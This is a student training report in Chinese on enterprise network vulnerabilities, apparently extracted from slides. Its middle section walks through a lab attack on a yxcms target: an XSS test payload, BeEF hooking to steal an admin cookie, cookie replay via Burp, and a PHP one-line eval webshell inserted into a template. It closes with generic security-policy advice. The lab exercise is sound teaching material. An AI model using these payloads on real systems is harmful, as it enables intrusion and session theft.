实训报告杨雨祥副本

实训报告212734031杨雨祥-副本XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX-目录目录01实训报告212734031杨雨祥-副本学号：212734031姓名：杨雨祥指导教师：代锐锋日期：2023年11月20日内蒙古电子信息职业技术学院信息安全技术应用专业综合实训报告班级：信安2141目录目录1、实训项目：企业网络的漏洞预测与防范技术研究2、实训目的3、时间安排4、实训内容及过程(%3)文件上传漏洞(%3)XSS漏洞获取服务器权限五、实训成果六、实训收获1、实训项目目录第一周搭建实训环境第二周利用各种渗透测试工具第三周分析漏洞的危害，如对网站的影响、数据泄露等；对发现的漏洞进行修补，采取防范措施。第四周整理相关资料形成实训报告。企业网络的漏洞预测与防范技术研究2、实训目的1、熟悉企业网络的组成，以及它们之间的关联2、掌握漏洞利用的技术和方法，以及时发现漏洞3、理解如何进行防范，如使用防火墙、IPS、WAF等技术4、了解如何编写防护策略和应急响应措施5、运用所学的知识，为企业提供有效的安全建议3、时间安排目录4、实训内容及过程1、搭建实训环境2、利用各种渗透测试工具，发现企业的网络漏洞3、分析漏洞的危害，如对网站的影响、数据泄露等4、对发现的漏洞进行修补，采取防范措施5、编制安全策略，为企业提供指导和参考文件上传漏洞进入后台插入木马目录NEXT木马未被截杀，插入成功木马插入之后并不知道路径在哪切换页面，激活木马编译一下"一句话"，成功拿到shell该木马俗称"一句话木马"利用文件上传漏洞，该木马本身并不具备威胁，但可以通过该代码上传一些可能造成危害的东西XSS漏洞XSSQ是一种常见的Web应用漏洞，该漏洞的产生是由于网站将用户输入的恶意代码不经过滤便输出到页面，导致恶意语句被执行，造成客户端被攻击的危害在攻击者进行测试的时候，通常涉及到的业务功能处有:用户留言板、用户反馈、用户发帖、用户个人信息修改等本靶场配置了yxcms留言板功能存储型XSS目录访问htp:/33/yxcms页面，浏览网页相关消息，留言本模块中留言内容部分插入Xss测试代码scriptalert(1)/script》123456模拟管理员查看留言管理，发现出现消息弹窗确定网站存在存情型XXS后，让利用bef-xss的hook功模块获取后台管理员的cookie消息。首先Kl政击机启动peel-xSs，修改登录密码为jkxy@123访问beef-xss的管理界面::3000/ui/panel，使用账号密码beef/jkxy@123成功登录使用beef平台生成的hook进行XSS攻击，在留言本中发布一个带hook的评论模拟后台管理员审核操作目录1在Kali攻击机上登录beef，这里可以看到被勾连的浏览器，获得了其登录的URL和cookie2利用BupSuite代理工具，抓取管理员后台登录时的请求包，在Proxy->0ption->MachandReplace板块添加一个规则:Cookie.s，其中Cookie填入beefxss中获取的cookie消息，添加好后把enaled勾上，这样每次经过burp的请求都是固定的cookie3使用浏览器重新访问后台网站，发现直接登录后台管理页面4成功登录CMS管理员后台后，找到模板编辑处，往indexindex.php中，插入一句话5<?phpeval($posT["jkxy"]);?>目录安全策略43至此成功获取服务器权限2测试中国蚁剑文件管理功能，发现成功回显webshell所在目录C:phpStudyWWW/yxcms/public，说明中国蚁剑成功连接webshel1中国蚁剑连接htp://02yxcms/indexphp，使用ipconig命今进行虚拟终端功能测试，发现能成功返回Windows7服务器IP地址33制定明确的安全政策和目标：企业应明确其安全策略，包括保护数据的机密性、完整性和可用性，以及应对潜在的安全威胁。此外，企业应设定明确的安全目标和指标，以便评估安全措施的有效性65企业安全策略是企业管理者为了保护企业信息资产和资源而制定和实施的一系列措施。这些措施旨在预防、检测和应对各种安全威胁，从而确保企业的网络安全和业务连续性。以下是一些企业安全策略的关键方面目录建立安全培训计划：企业应定期为员工提供安全培训，提高员工对安全问题的意识和技能。培训内容可以包括如何识别和防范网络钓鱼攻击、如何安全地使用公共Wi-Fi、如何避免常见的网络安全风险等实施访问控制和身份认证：企业应确保只有授权人员才能访问敏感数据和系统。实施多因素身份认证和强密码策略，以增强帐户的安全性。同时，定期监控和审查访问权限，确保帐户的安全性保护数据备份和恢复：企业应制定数据备份和恢复计划，以确保在发生安全事件时能够迅速恢复数据和系统。备份数据应存储在安全的地方，并定期测试恢复过程以确保其有效性5、实训成果目录1234漏洞扫描和评估：实训期间，应学习和掌握如何使用漏洞扫描工具，来发现和评估网络中的漏洞。还应理解如何解析扫描结果，识别潜在的安全风险，并制定相应的修复计划安全加固：实训中，应了解如何对网络设备、服务器和终端设备进行安全加固，包括配置防火墙、更新补丁、禁用不必要的服务等。还应学习如何制定和实施安全政策和最佳实践，以减少潜在的安全风险渗透测试：通过模拟黑客攻击，渗透测试可以有效地评估企业网络的安全性。实训中，应学习如何执行渗透测试，如何分析和解决发现的安全问题，以及如何制定相应的防御策略应急响应：实训期间，应学习和实践如何在发生网络攻击时进行应急响应。应了解如何收集和分析日志文件，如